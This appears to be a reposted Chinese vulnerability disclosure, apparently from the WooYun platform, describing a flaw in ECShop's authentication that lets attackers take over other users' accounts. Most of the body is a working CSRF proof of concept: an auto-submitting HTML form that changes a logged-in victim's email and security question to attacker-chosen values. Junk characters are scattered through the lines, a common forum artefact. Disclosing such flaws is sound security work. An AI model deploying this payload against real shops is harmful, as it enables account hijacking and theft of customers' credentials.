简要描述:
" ^/ P- Y) A) x- \ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现& x+ O6 z0 w' B, p6 B0 v4 p
8 I8 ^ u9 F5 g# {
Demo For:http://www.wooyun.org/bug.php?action=view&id=3959 u& p' ^, o, s- e) [! J8 f$ c
0 U( |* \% G' {8 g8 N! l7 ]; I* U
详细说明:! B4 B8 C' K, ?4 y
利用csrf和xss可以突破官方所说的“障碍”
% E) U U# R( o2 r$ V4 D Vxss版本已经有人说明: g" g4 x' r8 E) J
这里给出csrf版本( c( P% {3 f8 z3 |6 T
2 T. j8 P$ |2 Z6 u
漏洞证明:- l+ x6 {" D* y; y5 j
<html>
1 o6 |( T0 W" R. x<body>
, ^1 M/ B6 {5 d$ H( m<form action="http://www.wooyun.org/ecshop/user.php" method="POST">4 _4 J0 T7 w- k d
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
3 Y# r/ K$ q+ ~3 h<INPUT TYPE="text" NAME="act" value="act_edit_profile">! m* }2 H3 p0 i$ o
<INPUT TYPE="text" NAME="sel_question" value="ecshop">6 w! r0 n- }6 j/ G' t
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
( V! F! @# x6 ]7 S1 O6 g</body>7 p1 Q; `- e. Y7 G0 ?% B
<script>
?. ]0 [" Q" ^( @" \2 U- k% Cdocument.forms[0].submit();# \ p; l8 g$ V$ i
</script>
1 h* D6 _, h l: {5 f3 A: N</html>
7 _: z4 H8 ~- W% @; X' P构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失. F3 C3 a7 ^9 \" e
) D) l/ j1 \! a, C
|